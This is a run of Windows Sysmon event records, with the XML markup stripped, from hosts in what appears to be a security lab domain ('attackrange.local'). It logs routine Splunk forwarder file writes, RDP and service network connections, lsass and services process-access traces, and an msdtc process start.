23542300x80000000000000001056124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:15.478{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:15.072{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36486F46FF90DC03449FE654175E2A19,SHA256=EB38404F5C0D1DA4D016815A34DFD888993D74150496CC53F4A19DDA7845818B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:15.572{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15WIN-HOST-54259522-false10.0.1.14win-dc-429.attackrange.local49672- 354300x80000000000000001056127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:15.427{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54218-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001056126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:16.103{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13FD92984FAD019EDAE73F62A158DDA3,SHA256=29EFF22B30D1543D78FFCF07DCDC78E8B0E1561F09C6434B4B60BCE8B229B864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980939Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:16.746{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5962DA358EDCA6DDEF3A5D3EE793F1FB,SHA256=60D027E184FEF2DA97872F237F7D29F05C0373551AF66AA382F2B17FBF6653B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980938Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:16.746{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3CEAF196B5CF0944B6B816F6585E4C7,SHA256=D219216F2992A0ECB5E0D3B4D7092A0FC2C580889F3FC05930D8E06D34AAFD48,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980937Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:13.526{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63788-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980936Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:15.996{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E28A97A552794DCA704D1582CE73499,SHA256=1EE4059715D137A65705A8342189CC6D5AA25F03D684449236EEBF33570077DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980942Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:14.372{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59522-false10.0.1.14-49672- 354300x8000000000000000980941Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:14.356{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54512-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980940Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:16.996{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFFC2F1A1E8C861B4CFFAB232ACE2FC3,SHA256=CCF0D327B66092481F614D58442E2078339F4DB3434796858536D45664E15009,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:17.948{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:17.948{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:17.948{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:17.948{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:17.104{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DE8AD941B6E6874EE2402772FB0833D,SHA256=115D63E4378C82EDD5E09329EFDCA476A3B2D2701BE73D280A1480D9A977D11A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980943Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:18.214{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4DE2ACF13B97833E8B3991036A4EA0B,SHA256=C57798443B581B5BC9B75E6A248BFE23F7F2D0E6D3E5C7A949047668CDDFA403,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.932{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D4A-6151-A300-00000000FD01}6088C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.932{5EBD8912-8CBD-6151-0A00-00000000FD01}624684C:\Windows\system32\services.exe{5EBD8912-8D4A-6151-A300-00000000FD01}6088C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.854{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.854{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.854{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.729{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=725A6EF1752AE9965DD3D2D3CAFC89F7,SHA256=C37285F28AC878B36B512BE720F194035225B0410EC5BBF6EDA960B7C46E918E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.729{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=AEC668429FA0A30DFB24C6BA03389550,SHA256=1F2AF725D52DB4674841F8BD114B2F741F11766D2A099DF5379C8A7CEA662C5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.667{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D4A-6151-A200-00000000FD01}6012C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.667{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D4A-6151-A200-00000000FD01}6012C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.604{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8D4A-6151-A200-00000000FD01}6012C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.479{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.479{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.463{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.463{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.463{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D4A-6151-A200-00000000FD01}6012C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.463{5EBD8912-8CBD-6151-0A00-00000000FD01}624684C:\Windows\system32\services.exe{5EBD8912-8D4A-6151-A200-00000000FD01}6012C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.471{5EBD8912-8D4A-6151-A200-00000000FD01}6012C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{5EBD8912-8CBF-6151-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001056151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 